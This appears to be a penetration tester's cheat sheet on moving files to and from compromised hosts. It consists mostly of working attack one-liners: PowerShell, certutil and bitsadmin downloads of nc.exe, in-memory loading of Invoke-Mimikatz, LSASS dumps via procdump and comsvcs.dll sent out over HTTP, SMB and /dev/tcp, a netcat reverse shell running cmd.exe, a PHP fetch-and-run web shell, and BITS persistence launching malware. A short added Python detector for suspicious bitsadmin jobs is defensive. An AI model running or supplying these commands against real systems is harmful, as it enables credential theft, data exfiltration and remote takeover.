File Transfer

Basic commands

python -m SimpleHTTPServer 80
php -S 0.0.0.0:80

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe" -Destination C:\temp\nc.exe)
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
powershell Invoke-WebRequest http://10.10.14.10/nc.exe -OutFile nc.exe
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

execute ps1 files

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1

load it into the memory

IEX(New-Object Net.WebClient).downloadString('http://10.10.15.189:9999/jaws-enum.ps1')
powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.14/shell.ps1\")
powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.14.14/shell.ps1\")

ninja1

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.15.189:9999/jaws-enum.ps1" >>wget.ps1
echo $file = "jaws.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

SMB

python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support
net view \\10.10.14.17
copy \\10.10.14.17\a\nc.exe .
copy nc2.exe \\10.10.14.17\a\nc2.exe

SMB with password + lsass dump

python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
C:\>net use s: \\10.201.69.16\a /user:admin 123
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
copy c:\TEMP\a.txt.dmp s:

Execute nc via SMB (bypass defenses)

\\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe

netcat

ncat -lvp 80 > nc2.exe
nc -nv 10.10.14.17 80 < nc.exe -w 15

copy files from target to kali

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"http://10.9.4.210:9999/\", \"lsass.dmp\")
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('http://10.92.137.181:8888', 'zzzzzz.txt.dmp')

nc -lvp 9999 > lsasss.dmp

with PHP

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

HTTP-POST

http-post.py
./curl -F '[email protected]_190824_231811.dmp' 10.10.15.213:8000/ -v

/dev/tcp

cat xxx.zip > /dev/tcp/10.x.x.x/9001
nc -lvp 9001 > xxx.zip

fetch (OpenBSD)

fetch http://10.11.0.244/exploit.c
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?>

rdesktop or remmina

rdesktop -r disk:tmp=/home/user/Desktop <remote ip address>

BITS

Download file into the C:\Windows folder.
> bitsadmin /create download
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
> bitsadmin /resume download
> bitsadmin /complete download

Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
Job resumed.
Job completed.
Create persistence.
> bitsadmin /create persistence
> bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
> bitsadmin /resume persistence
Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service | Mandiant
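
For triage of the two bitsadmin sequences above, an added example (not from the original page or the Mandiant article): a Python function that groups bitsadmin process command lines by job and flags a notify command line, a destination under C:\Windows, or a loopback source. The sample input is constructed from the commands on this page; the function names and finding names are assumptions of this example.

```python
import re
import shlex
from collections import defaultdict

# Constructed sample: process-creation command lines (as recorded by command-line
# auditing), mirroring the bitsadmin sequences on this page.
SAMPLE_CMDLINES = [
    r"bitsadmin /create download",
    r"bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe",
    r"bitsadmin /resume download",
    r"bitsadmin /complete download",
    r"bitsadmin /create persistence",
    r"bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe",
    r"bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL",
    r"bitsadmin /resume persistence",
    r"bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe",
]
LOOPBACK = re.compile(r"^https?://(127\.0\.0\.1|localhost|\[::1\])([:/]|$)", re.I)

def tokens_of(cmdline):
    """Split a Windows command line, keeping backslashes and dropping quotes."""
    try:
        parts = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quote: fall back to a whitespace split
        parts = cmdline.split()
    return [p.strip('"') for p in parts]

def flag_bits_jobs(cmdlines):
    """Return {job name: sorted finding names} for bitsadmin jobs worth triage."""
    findings = defaultdict(set)
    for line in cmdlines:
        t = tokens_of(line)
        exe = t[0].lower().rsplit("\\", 1)[-1] if t else ""
        if len(t) < 3 or exe not in ("bitsadmin", "bitsadmin.exe"):
            continue
        switch, job = t[1].lower(), t[2]
        if switch == "/setnotifycmdline":  # program BITS runs when the job finishes or errors
            findings[job].add("notify-cmdline")
        if switch in ("/addfile", "/transfer") and len(t) >= 5:
            url, dest = t[-2], t[-1]
            if dest.lower().startswith("c:\\windows\\"):
                findings[job].add("system-dir-destination")
            if LOOPBACK.match(url):
                findings[job].add("loopback-source")
    return {job: sorted(names) for job, names in findings.items()}

if __name__ == "__main__":
    for job, names in flag_bits_jobs(SAMPLE_CMDLINES).items():
        print(job, names)
```

Jobs created with Start-BitsTransfer or the BITS COM API do not appear in bitsadmin command lines, so this covers only the bitsadmin usage shown on this page.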

updog

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates, and can use HTTP basic auth.
or simply:
python -m SimpleHTTPServer 8080
or HTTPS with upload:
SecurityTools/httpsWithUpload.py at master · rhmoult/SecurityTools
